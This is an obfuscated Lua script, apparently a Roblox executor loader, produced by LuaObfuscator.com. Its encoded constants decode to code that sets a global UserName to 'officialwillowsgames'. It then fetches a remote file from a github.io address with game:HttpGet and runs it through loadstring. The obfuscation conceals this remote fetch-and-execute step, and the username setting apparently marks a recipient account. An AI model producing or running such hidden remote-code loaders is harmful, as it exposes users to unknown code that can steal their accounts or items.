--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==1) then function v21(v31,v32,v33)if v33 then local v69=0 + 0 + 0 ;local v70;while true do if (v69==(0 + 0)) then v70=(v31/(((2469 -1458) -((1327 -(216 + 250)) + 148))^(v32-1)))%((2 -0)^(((v33-((300 + 170) -(388 + 81))) -(v32-(1 + 0))) + (682 -(301 + 380)))) ;return v70-(v70%1) ;end end else local v71=0 + (0 -0) ;local v72;while true do if (v71==(0 -0)) then v72=(3 -(2 -1))^(v32-(1 + 0)) ;return (((v31%(v72 + v72))>=v72) and (329 -(150 + 178))) or (1962 -(1890 + 72)) ;end end end end v22=nil;function v22()local v34=v1(v16,v19,v19);v19=v19 + 1 ;return v34;end v23=nil;v18=2;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v35)if (v1(v35,2)==79) then local v73=0;while true do if (v73==0) then v20=v0(v3(v35,1,1));return "";end end else local v74=v2(v0(v35,16));if v20 then local v78=0;local v79;while true do if (v78==1) then return v79;end if (0==v78) then v79=v5(v74,v20);v20=nil;v78=1;end end else return v74;end end end);v21=nil;v18=1;end if (v18==2) then function v23()local v36,v37=v1(v16,v19,v19 + (6 -4) );v19=v19 + 2 + 0 ;return (v37 * (42 + 214)) + v36 ;end v24=nil;function v24()local v38,v39,v40,v41=v1(v16,v19,v19 + (5 -2) + 0 );v19=v19 + (10 -6) ;return (v41 * (12248431 + 4528785)) + (v40 * 65536) + (v39 * ((1463 -(871 + 210)) -(71 + 55))) + v38 ;end v25=nil;v18=3;end if (v18==3) then function v25()local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(5 -3)) then v47=v21(v44,(1008 -(568 + 341)) -78 ,(544 + 628) -(493 + (1058 -(55 + 355))) );v48=((v21(v44,76 -44 )==(1 + 0)) and  -(1 + 0)) or (1 -0) ;v42=219 -(102 + 114) ;end if (v42==(1 + 0)) then v45=1 + 0 ;v46=(v21(v44,1 -0 ,14 + 2 + 4 ) * ((1030 -(947 + 81))^(19 + 13))) + v43 ;v42=1214 -(48 + (1979 -(110 + 705))) ;end if (v42==3) then if (v47==(627 -(161 + 466))) then if (v46==(0 -0)) then return v48 * (0 -0) ;else local v105=0 + 0 ;while true do if (v105==(318 -(314 + 4))) then v47=1 + 0 ;v45=0 -0 ;break;end end end elseif (v47==((17976 -14130) -(982 + 817))) then return ((v46==(0 + (977 -(428 + 549)))) and (v48 * (1/0))) or (v48 * NaN) ;end return v8(v48,v47-(2966 -(1273 + 670)) ) * (v45 + (v46/(((996 -(295 + 699)) + 0)^52))) ;end if (v42==(0 + 0)) then v43=v24();v44=v24();v42=1 -(24 -(10 + 14)) ;end end end v26=nil;function v26(v49)local v50=(1510 -(1139 + 371)) + 0 + 0 ;local v51;local v52;while true do if (v50==(1528 -(1001 + 525))) then v52={};for v80=1, #v51 do v52[v80]=v2(v1(v3(v51,v80,v80)));end v50=877 -(410 + 464) ;end if ((4 -1)==v50) then return v6(v52);end if ((1872 -(1232 + 639))==v50) then v51=v3(v16,v19,(v19 + v49) -1 );v19=v19 + v49 ;v50=9 -7 ;end if (v50==(0 + 0)) then v51=nil;if  not v49 then v49=v24();if (v49==(0 + 0)) then return "";end end v50=(1 + 0) -0 ;end end end v27=v24;v18=4;end if (v18==5) then v30=nil;function v30(v53,v54,v55)local v56=0;local v57;local v58;local v59;while true do if (v56==1) then v59=v53[3];return function(...)local v82=1;local v83= -1;local v84={...};local v85=v12("#",...) -1 ;local function v86()local v87=v57;local v88=v58;local v89=v59;local v90=v28;local v91={};local v92={};local v93={};for v97=1707 -(767 + 940) ,v85 do if ((v97>=v89) or ((10803 -7763)<(3209 -1789))) then v91[v97-v89 ]=v84[v97 + 1 + 0 ];else v93[v97]=v84[v97 + 1 + 0 ];end end local v94=(v85-v89) + 1 + 0 ;local v95;local v96;while true do local v98=1982 -(259 + 1723) ;local v99;local v100;while true do if (((1810 -(539 + (3365 -2161)))<=(391 + 1120)) and (v98==(3 -2))) then while true do if ((v99==(0 + 0)) or ((1232 + 613)==(2107 -(741 + 3)))) then v100=0;while true do if (((5461 -(370 + 1383))>=(2737 -(61 + 120))) and ((0 -0)==v100)) then local v114=0 + 0 ;while true do if ((v114==1) or ((8817 -(1613 + 5278))>=(7870 -4999))) then v100=2 -1 ;break;end if (((3117 -(1389 + 569))<(1777 + 404)) and (v114==0)) then local v119=0;while true do if (((1161 + 1330)<(8619 -5041)) and (((613 -(574 + 39)) + 0)==v119)) then v95=v87[v82];v96=v95[1821 -(1313 + 507) ];v119=2 -(1 + 0) ;end if (((3617 -(123 + 965))<(15362 -10568)) and (v119==(1535 -(12 + 1522)))) then v114=1 + 0 ;break;end end end end end if (((1943 + 2063)>(373 + 965)) and (v100==(1 -0))) then if ((v96<=(1002 -(874 + 123))) or ((2605 -(217 + 774))==(1035 + 739))) then if ((1482==(1070 + 412)) and (v96<=2)) then if (((1168 -(794 + 238))<(4240 -(320 + 1140))) and (v96<=(0 + 0))) then v82=v95[1 + 2 ];elseif ((v96==(1485 -(772 + 712))) or (1949<(3909 -2514))) then local v142=0 -(0 + 0) ;local v143;local v144;local v145;local v146;local v147;while true do if ((2480>((1442 -(141 + 207)) + 1236)) and (v142==(3 -2))) then v145=nil;v146=nil;v142=2;end if ((v142==2) or ((3894 -(55 + 603))<((2472 -(742 + 1089)) + 23))) then v147=nil;while true do if ((v143==(2 + 0)) or ((322 + 77)<(783 -(191 + 227)))) then for v168=v144,v83 do local v169=1071 -(869 + 202) ;local v170;while true do if ((v169==(0 + 0)) or (((1270 + 772) -964)>(7013 -2170))) then v170=(110 + 1260) -(1368 + 2) ;while true do if ((3339<=(13207 -(10755 -(1006 + 764)))) and (v170==(0 -0))) then v147=v147 + (3 -2) ;v93[v168]=v145[v147];break;end end break;end end end break;end if (((0 + (0 -0))==v143) or ((740 + 1841)==(47 + 317))) then local v162=1302 -(109 + 1193) ;while true do if (((2740 + (1354 -(155 + 353)))>=2828) and (v162==(1 -0))) then v143=1 + 0 ;break;end if (((5754 -(155 + 1769))>(1520 -(306 + 722 + 80))) and (v162==(0 -0))) then v144=v95[1 + 1 ];v145,v146=v90(v93[v144](v13(v93,v144 + 1 + 0 ,v95[464 -(363 + 98) ])));v162=1 -0 ;end end end if (((157 + 225 + 182)<=3710) and (v143==1)) then v83=(v146 + v144) -(2 -1) ;v147=0 + 0 ;v143=1706 -(1665 + 39) ;end end break;end if (((3561 -1680)<(3660 -((57 -37) + (2748 -(56 + 996))))) and (v142==(0 + 0))) then v143=0 + 0 ;v144=nil;v142=1;end end else do return;end end elseif ((2904<(3739 -(404 + 337))) and (v96<=(3 + 0))) then v93[v95[2]]=v55[v95[3 + 0 ]];elseif (((643 + 278)==(240 + 681)) and (v96==4)) then v93[v95[2 -0 ]]=v95[624 -(423 + 198) ]~=((0 -0) -0) ;else v55[v95[3 + (0 -0) ]]=v93[v95[2 -0 ]];end elseif (((387 + 667)<(4110 -(36 + 1308))) and (v96<=(25 -17))) then if (((1687 -((621 -396) + 366))<=3816) and (v96<=(1 + 5))) then for v139=v95[5 -3 ],v95[9 -6 ] do v93[v139]=nil;end elseif ((v96>(1259 -((789 -262) + 725))) or ((13 + 2875)<=(8554 -6094))) then local v151=1460 -(1300 + 160) ;local v152;local v153;local v154;while true do if ((v151==(0 -0)) or ((6191 -(596 + 791))==((10802 -7103) -(214 + 176)))) then v152=1412 -(1290 + 122) ;v153=nil;v151=1 + 0 ;end if ((v151==1) or ((1388 -(320 + 193))>(3150 -2021))) then v154=nil;while true do if (((6742 -(729 + 1079))>(1628 -(56 + 795))) and (v152==(1568 -(1160 + 407)))) then v93[v153 + 1 ]=v154;v93[v153]=v154[v95[2 + 2 ]];break;end if (((28 + 805)<(6495 -(5539 -(1265 + 331)))) and (v152==(0 -0))) then v153=v95[917 -(294 + 621) ];v154=v93[v95[1946 -(939 + 1004) ]];v152=1 + 0 ;end end break;end end else v93[v95[2 + 0 ]]=v95[5 -(4 -2) ];end elseif (((5385 -3941)<(4294 -2157)) and (v96<=(28 -19))) then if (((6187 -(661 + 1338))>=(4712 -(956 + 686))) and (v93[v95[4 -(54 -(6 + 46)) ]]==v95[1828 -(1027 + 797) ])) then v82=v82 + 1 + 0 ;else v82=v95[3];end elseif ((v96>(4 + 6)) or ((812 -(632 + 35))>(65 + 3139))) then local v158=(30 + 1320) -(193 + (1830 -(589 + 84))) ;local v159;local v160;local v161;while true do if (((1 + 0)==v158) or (((547 -(7 + 29)) + 1279)>=(1610 + 881))) then v161=nil;while true do if (((1981 -(971 + 610))==(1009 -(602 + 7))) and (v159==(1 + 0 + 0))) then while true do if ((158<2103) and (v160==0)) then v161=v95[5 -3 ];v93[v161]=v93[v161](v13(v93,v161 + 1 ,v83));break;end end break;end if (((1526 + 3269)==(4892 -(21 + 76))) and ((942 -(550 + 392))==v159)) then v160=1615 -((3534 -2274) + 355) ;v161=nil;v159=1702 -(226 + 1475) ;end end break;end if ((v158==(0 + 0)) or ((6048 -(144 + 1059))==(1333 + (898 -539)))) then v159=0;v160=nil;v158=3 -2 ;end end else v93[v95[1663 -((947 -(343 + 83)) + 1140) ]]();end v82=v82 + ((337 + 374) -(76 + 634)) ;break;end end break;end end break;end if (((3353 -2501)==852) and (v98==(992 -(456 + 536)))) then v99=0;v100=nil;v98=510 -(385 + 124) ;end end end end A,B=v28(v11(v86));if  not A[1] then local v101=0;local v102;while true do if (0==v101) then v102=v53[4][v82] or "?" ;error("Script error at ["   .. v102   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end if (v56==0) then v57=v53[1];v58=v53[2];v56=1;end end end return v30(v29(),{},v17)(...);end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v60=0 + 0 ;local v61;local v62;local v63;local v64;local v65;local v66;local v67;local v68;while true do if (v60==3) then v67=nil;v68=nil;v60=4;end if ((1218 -(784 + 433))==v60) then v63=nil;v64=nil;v60=223 -(132 + 89) ;end if (v60~=(2 -0)) then else v65=nil;v66=nil;v60=2 + 1 ;end if (v60~=4) then else while true do if (v61==(1 + 1)) then v66=nil;v67=nil;v61=5 -2 ;end if (v61~=(1437 -(1026 + 408))) then else v68=nil;while true do if (v62==(1945 -(1866 + 79))) then v63={};v64={};v65={};v66={v63,v64,nil,v65};v62=1052 -(549 + 502) ;end if (v62==(1 + 0)) then local v110=0 + 0 ;local v111;while true do if (v110~=0) then else v111=357 -(232 + 125) ;while true do if (v111==0) then local v115=0;while true do if (v115==(3 -2)) then v111=1 + 0 ;break;end if (v115==(0 + 0)) then v67=v24();v68={};v115=1;end end end if ((1 + 0)==v111) then local v116=0 + 0 ;while true do if (v116~=(945 -(713 + 231))) then else v111=2;break;end if (0==v116) then for v121=1,v67 do local v122=0 -0 ;local v123;local v124;while true do if (v122==(0 -0)) then v123=v22();v124=nil;v122=1;end if (v122==(1141 -(1056 + 84))) then if (v123==(670 -(392 + 277))) then v124=v22()~=(0 -0) ;elseif (v123==(5 -3)) then v124=v25();elseif (v123~=(3 + 0)) then else v124=v26();end v68[v121]=v124;break;end end end v66[1099 -(648 + 448) ]=v22();v116=1 + 0 ;end end end if (v111~=(2 -0)) then else v62=2 + 0 ;break;end end break;end end end if (v62==2) then local v112=136 -(74 + 62) ;local v113;while true do if (v112==(0 -0)) then v113=0;while true do if (v113~=(1100 -(679 + 421))) then else local v117=0;while true do if (v117~=0) then else for v125=1410 -(361 + 1048) ,v24() do local v126=0 -0 ;local v127;local v128;local v129;while true do if (v126==(1 -0)) then v129=nil;while true do if (v127==(0 -0)) then v128=177 -(68 + 109) ;v129=nil;v127=1;end if (v127==(3 -2)) then while true do if (v128==(0 -0)) then v129=v22();if (v21(v129,1 + 0 ,1657 -(587 + 1069) )==(0 + 0)) then local v171=1701 -(281 + 1420) ;local v172;local v173;local v174;local v175;local v176;while true do if (v171==2) then v176=nil;while true do if (v172==(1169 -(1157 + 11))) then local v182=892 -(574 + 318) ;while true do if (v182~=(0 -0)) then else v175=nil;v176=nil;v182=530 -(344 + 185) ;end if (v182==(2 -1)) then v172=840 -(26 + 812) ;break;end end end if ((115 -(110 + 5))==v172) then v173=1093 -(450 + 643) ;v174=nil;v172=1 -0 ;end if (v172==(5 -3)) then while true do if (v173~=(2 + 0)) then else local v183=0;while true do if (v183==0) then local v190=0 + 0 ;while true do if (v190==(1 + 0)) then v183=1 -0 ;break;end if (v190~=0) then else if (v21(v175,1,1532 -(1112 + 419) )==1) then v176[4 -2 ]=v68[v176[2]];end if (v21(v175,746 -(497 + 247) ,2)==(1 + 0)) then v176[6 -3 ]=v68[v176[1942 -(65 + 1874) ]];end v190=1551 -(764 + 786) ;end end end if (v183==(1 + 0)) then v173=1078 -(498 + 577) ;break;end end end if (v173==(337 -(156 + 178))) then if (v21(v175,3,13 -10 )==(1 + 0)) then v176[10 -6 ]=v68[v176[2 + 2 ]];end v63[v125]=v176;break;end if (v173==1) then local v185=0;local v186;while true do if (v185~=0) then else v186=425 -(233 + 192) ;while true do if ((1 + 0)~=v186) then else v173=2 -0 ;break;end if (v186==(0 -0)) then local v191=0;while true do if (0==v191) then v176={v23(),v23(),nil,nil};if (v174==(0 -0)) then local v196=0;local v197;while true do if (v196==(0 + 0)) then v197=0;while true do if (0~=v197) then else v176[1 + 2 ]=v23();v176[133 -(62 + 67) ]=v23();break;end end break;end end elseif (v174==(1 + 0)) then v176[1 + 2 ]=v24();elseif (v174==(9 -7)) then v176[2 + 1 ]=v24() -((2 + 0)^(740 -(518 + 206))) ;elseif (v174==(443 -(389 + 51))) then local v202=0 + 0 ;local v203;local v204;while true do if (v202==(1161 -(617 + 544))) then v203=0 + 0 ;v204=nil;v202=1790 -(1763 + 26) ;end if (v202==(2 -1)) then while true do if (v203~=(0 -0)) then else v204=1386 -(1128 + 258) ;while true do if (v204~=(1597 -(827 + 770))) then else v176[3]=v24() -((869 -(617 + 250))^(7 + 9)) ;v176[3 + 1 ]=v23();break;end end break;end end break;end end end v191=851 -(38 + 812) ;end if (v191==(235 -(36 + 198))) then v186=1 -0 ;break;end end end end break;end end end if (v173==(1716 -(1014 + 702))) then local v187=0 + 0 ;while true do if (v187~=(0 + 0)) then else v174=v21(v129,1 + 1 ,3);v175=v21(v129,810 -(354 + 452) ,2 + 4 );v187=2 -1 ;end if (v187==1) then v173=1857 -(606 + 1250) ;break;end end end end break;end end break;end if ((0 -0)==v171) then v172=0;v173=nil;v171=1 + 0 ;end if (1==v171) then v174=nil;v175=nil;v171=1 + 1 ;end end end break;end end break;end end break;end if (v126==0) then v127=136 -(52 + 84) ;v128=nil;v126=1;end end end for v130=1,v24() do v64[v130-1 ]=v29();end v117=58 -(35 + 22) ;end if ((2 -1)~=v117) then else v113=1 + 0 ;break;end end end if (v113==(1340 -(432 + 907))) then local v118=0;while true do if (v118==(461 -(302 + 159))) then for v132=1,v24() do v65[v132]=v24();end return v66;end end end end break;end end end end break;end if (v61~=0) then else local v103=1427 -(87 + 1340) ;while true do if (v103==(1 + 0)) then v61=1;break;end if (v103==(0 + 0)) then v62=0;v63=nil;v103=2 -1 ;end end end if ((1 + 0)==v61) then local v104=0 + 0 ;while true do if (v104==(1 + 0)) then v61=2;break;end if (v104==(0 -0)) then v64=nil;v65=nil;v104=1 + 0 ;end end end end break;end if (v60~=(0 + 0)) then else v61=0;v62=nil;v60=1;end end end v18=5;end end end v15("LOL!073O00028O0003083O00557365724E616D6503143O006F2O66696369616C77692O6C6F777367616D6573030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F72692O7A36392E6769746875622E696F2F4D61696E2E6C756100163O0012073O00014O0006000100013O0026093O00020001000100044O00020001001207000100013O002609000100050001000100044O00050001001207000200033O001205000200023O001203000200043O001203000300053O002008000300030006001207000500074O0004000600014O0001000300064O000B00023O00022O000A00020001000100044O0015000100044O0005000100044O0015000100044O000200012O00023O00017O00163O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
